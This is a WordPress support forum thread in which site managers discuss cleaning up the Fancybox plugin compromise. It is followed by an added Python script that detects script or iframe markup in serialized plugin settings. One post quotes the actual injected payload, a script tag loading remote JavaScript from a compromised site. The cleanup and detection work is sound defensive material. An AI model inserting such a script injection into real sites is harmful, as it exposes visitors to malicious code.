Title: Fancybox Hack
Last modified: August 22, 2016

---

# Fancybox Hack

 *  [jiminy](https://wordpress.org/support/users/sharrock/)
 * (@sharrock)
 * [11 years, 3 months ago](https://wordpress.org/support/topic/fancybox-hack/)
 * A site I manage was a victim of this recent Fancybox Islamic State hack. I seemed
   to have removed it (code in the wp_options table), and uninstalled fancybox. 
   Does anyone know if I need to do/remove something else?
 * Thanks very much.
 * [https://wordpress.org/plugins/fancybox-for-wordpress/](https://wordpress.org/plugins/fancybox-for-wordpress/)

Viewing 4 replies - 1 through 4 (of 4 total)

 *  [paulg000](https://wordpress.org/support/users/paulg000/)
 * (@paulg000)
 * [11 years, 3 months ago](https://wordpress.org/support/topic/fancybox-hack/#post-5882795)
 * One of the sites I developed also had this happen and I isolated it to this plugin.
 * Strange thing is I run this plugin on 9/10 sites yet have not experienced it 
   w/any of them.
 * All software is up to date, I’d love some insight!
 * -Paul
 *  [paulg000](https://wordpress.org/support/users/paulg000/)
 * (@paulg000)
 * [11 years, 3 months ago](https://wordpress.org/support/topic/fancybox-hack/#post-5882796)
 * subscribing
 *  [Jose Pardilla](https://wordpress.org/support/users/moskis/)
 * (@moskis)
 * [11 years, 3 months ago](https://wordpress.org/support/topic/fancybox-hack/#post-5882800)
 * Hi,
 * Regarding fixing affected sites, from what I’ve seen it usually injected an iframe
   into the source of the site, stored in one of the plugin’s settings. In most 
   cases this can be removed by reverting the plugin settings or manually checking
   the settings and finding the malicious code, removing it and saving the plugin’s
   settings. After doing that you can clear cache on the site and check your source
   code, to see there are no iframes or strange code added in the HEAD tag, especially
   between the `<!-- Fancybox for WordPress -->` and `<!-- END of Fancybox for WordPress-->`
   lines.
 * As I said, I have only seen the vulnerability used for the iframe injection. 
   Nevertheless, for sites that were indeed affected by the issue it’s not a bad
   idea to change admin and db passwords to be sure.
 * For more info on the security issue that was found in February, please check 
   [https://wordpress.org/plugins/fancybox-for-wordpress/faq/](https://wordpress.org/plugins/fancybox-for-wordpress/faq/)
 *  [yst14](https://wordpress.org/support/users/yst14/)
 * (@yst14)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/fancybox-hack/#post-5882810)
 * A client's website was unfortunately at the mercy of this attack. I have just
   deleted and reinstalled the fancybox plugin; however, the malicious code was still
   in place upon reinstalling. I found the padding setting within the ‘mfbfw’ row
   of my database to still have the malicious code. I removed all contents of this
   row and re-saved my settings within WordPress and the code seems to have gone
   and all good so far!
 * This is what I had in the row:
    `a:1:{s:7:"padding";s:110:"</script><script type="text/javascript" src="http://www.caraparts.co.uk/wp-admin/js/xml.php"></script><script>";}`
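
The replies above describe the injected markup surviving a reinstall because it is stored in the plugin's saved settings (the `mfbfw` row). The following is an added example, not code from the thread or the plugin: it parses a PHP-serialized option value and lists every setting whose string value contains script or iframe markup. The function names and the clean sample value are assumptions made for illustration.

```python
import re

# Markup that should never appear in a plugin setting such as a padding value.
SUSPICIOUS = re.compile(rb"<\s*/?\s*(script|iframe)\b", re.IGNORECASE)

# Row value exactly as quoted in the last post above.
INFECTED = (b'a:1:{s:7:"padding";s:110:"</script><script type="text/javascript" '
            b'src="http://www.caraparts.co.uk/wp-admin/js/xml.php"></script><script>";}')
# Constructed clean value; "example_color" is a hypothetical setting name.
CLEAN = b'a:2:{s:7:"padding";s:2:"10";s:13:"example_color";s:7:"#BBBBBB";}'

def parse_php(data, pos=0):
    """Parse one PHP-serialized value (types N, b, i, s, a); return (value, next_pos)."""
    tag = data[pos:pos + 1]
    if tag == b"N":                                  # N;
        return None, pos + 2
    if tag in (b"i", b"b"):                          # i:42;  b:1;
        end = data.index(b";", pos)
        num = int(data[pos + 2:end])
        return (bool(num) if tag == b"b" else num), end + 1
    if tag == b"s":                                  # s:<byte length>:"<bytes>";
        colon = data.index(b":", pos + 2)
        start = colon + 2                            # skip :"
        stop = start + int(data[pos + 2:colon])
        if data[stop:stop + 2] != b'";':
            raise ValueError("declared string length does not match the data")
        return data[start:stop], stop + 2
    if tag == b"a":                                  # a:<count>:{key value ...}
        colon = data.index(b":", pos + 2)
        count, pos, items = int(data[pos + 2:colon]), colon + 2, {}
        for _ in range(count):
            key, pos = parse_php(data, pos)
            items[key], pos = parse_php(data, pos)
        return items, pos + 1                        # skip }
    raise ValueError(f"unsupported type tag {tag!r} at offset {pos}")

def find_injected(value, path="mfbfw"):
    """Return (setting path, text) for every string value containing script/iframe markup."""
    hits = []
    if isinstance(value, dict):
        for key, item in value.items():
            name = key.decode(errors="replace") if isinstance(key, bytes) else str(key)
            hits += find_injected(item, f"{path}.{name}")
    elif isinstance(value, bytes) and SUSPICIOUS.search(value):
        hits.append((path, value.decode(errors="replace")))
    return hits

if __name__ == "__main__":
    for label, raw in (("infected", INFECTED), ("clean", CLEAN)):
        print(label, find_injected(parse_php(raw)[0]))
```

The parser covers only the null, boolean, integer, string and array types, and it checks each declared string length against the data, so a hand-edited row with a wrong length raises an error instead of being misread.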

The topic ‘Fancybox Hack’ is closed to new replies.

 * 4 replies
 * 4 participants
 * Last reply from: [yst14](https://wordpress.org/support/users/yst14/)
 * Last activity: [11 years, 2 months ago](https://wordpress.org/support/topic/fancybox-hack/#post-5882810)
 * Status: not resolved